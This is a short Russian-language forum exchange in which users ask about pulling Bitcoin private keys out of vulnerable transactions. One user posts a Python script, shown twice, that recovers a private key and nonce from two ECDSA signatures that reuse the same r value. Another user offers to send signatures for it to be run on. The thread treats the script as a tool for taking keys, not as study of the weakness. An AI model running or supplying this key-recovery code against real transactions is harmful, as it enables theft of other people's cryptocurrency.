Кто нибудь пользовался этой атакой для извлечения privkey в уязвимой транзакции ?
RSZ + PUBKEY"r" вытащил?
этим пробовал?RSZ + PUBKEY
import math
r = 0x...
s1 = 0x...
s2 = 0x...
z1 = 0x...
z2 = 0x...
def inverse_mod(a, m):
"""Inverse of a mod m."""
if a == 0: # pragma: no branch
return 0
return pow(a, -1, m)
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
for (i, j) in [(1,1),(1,-1),(-1,1),(-1,-1)]:
z = z1 - z2
s = s1*i + s2*j
r_inv = inverse_mod(r, p)
s_inv = inverse_mod(s, p)
k = (z * s_inv) % p
d = (r_inv * (s1 * k - z1)) % p
print(f"Private key: {hex(d)}, {hex(k)}")
пробывал,слушай я тебе скину sig поюзай ихэтим пробовал?
Python:import math r = 0x... s1 = 0x... s2 = 0x... z1 = 0x... z2 = 0x... def inverse_mod(a, m): """Inverse of a mod m.""" if a == 0: # pragma: no branch return 0 return pow(a, -1, m) p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 for (i, j) in [(1,1),(1,-1),(-1,1),(-1,-1)]: z = z1 - z2 s = s1*i + s2*j r_inv = inverse_mod(r, p) s_inv = inverse_mod(s, p) k = (z * s_inv) % p d = (r_inv * (s1 * k - z1)) % p print(f"Private key: {hex(d)}, {hex(k)}")